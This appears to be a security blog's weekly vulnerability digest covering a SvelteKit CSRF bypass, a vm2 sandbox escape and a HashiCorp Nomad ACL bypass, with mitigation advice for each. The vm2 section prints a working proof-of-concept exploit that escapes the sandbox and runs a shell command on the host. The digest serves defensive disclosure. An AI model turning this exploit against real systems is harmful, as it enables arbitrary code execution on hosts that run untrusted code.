In this week’s digest, we will discuss the following:
- A CSRF protection bypass in SvelteKit;
- A sandbox escape in vm2 version; and
- An unauthenticated ACL authorization bypass for HashiCorp Nomad and Nomad Enterprise resulting in Privilege Escalation.
CVE-2023-29003: SvelteKit: CSRF Protection Bypass using Content-Type Header
Background
SvelteKit is a framework for building web applications using the Svelte JavaScript library. It provides a streamlined development experience by including features such as server-side rendering, routing, and file-based page routing out of the box.
Vulnerability
The vulnerability, CVE-2023-29003, affects SvelteKit versions below 1.15.1 because of the insufficient Cross-Site Request Forgery (CSRF) protection. Before SvelteKit 1.15.1, the CSRF protection was executed when three conditions were met: (1) request was a POST, (2) there was a mismatch between the site origin and the request’s origin HTTP header, and (3) whether the request included form content, indicated by a Content-Type Header of either “application/x-www-form-urlencoded” or “multipart/form-data.”
If all of these conditions were met, a 403 Forbidden response to the request would be sent. This checking could be bypassed by using a different Content-Type in the request, like “text/plain.”
Mitigation
- The vulnerability has been addressed in SvelteKit version 1.15.1. Upgrading to the latest version is the recommended way to fix this issue.
CVE-2023-29199: vm2: Sandbox Escape in Source Code Transformer
Background
vm2 is a Node.js module that provides a sandboxed environment for executing untrusted code in a secure manner. It allows for the creation of isolated execution contexts where attackers can execute untrusted code without the ability to access the global context or sensitive data.
Vulnerability
The vulnerability relies on an exception in sanitation logic of the source code transformer of vm2. This vulnerability allows an attacker to bypass the handleException() function and leak unsanitized host exceptions opening the door for an attacker to escape the sandbox and run arbitrary code in the host context.
GitHub user leesh3288 did a proof of concept to exploit this vulnerability, which shows how easily code can be executed in the host context:
const {VM} = require("vm2");
const vm = new VM();
const code = `
aVM2_INTERNAL_TMPNAME = {};
function stack() {
new Error().stack;
stack();
}
try {
stack();
} catch (a$tmpname) {
a$tmpname
.constructor
.constructor('return process')()
.mainModule.require('child_process')
.execSync('touch pwned');
}
`
console.log(vm.run(code));
Mitigation
- The vulnerability has been addressed in vm2 version 3.9.16. Upgrading to the latest version is the recommended way to fix this issue.
CVE-2023-1782: HashiCorp Nomad: Unauthenticated ACL Bypass Privilege Escalation
Background
HashiCorp Nomad is a container orchestration platform that enables users to easily deploy and manage applications across various environments, including data centers, cloud, and edge locations. It provides features such as automated deployment, scaling, and self-healing, as well as support for multiple container runtimes and scheduling algorithms.
Vulnerability
There are not many specifics for this vulnerability. However, based on the researcher’s report, unauthenticated HTTP requests can bypass the intended ACL authorizations whenever a request is processed on the server through internal RPCs. This vulnerability affects HashiCorp Nomad and HashiCorp Nomad Enterprise for versions 1.5.0 up to 1.5.2.
Mitigation
- This vulnerability can be remediated by enabling mTLS on their host cluster.
- This vulnerability has been addressed in HashiCorp Nomad version 1.5.3. Upgrading to the latest version is the recommended way to fix this issue.
Comments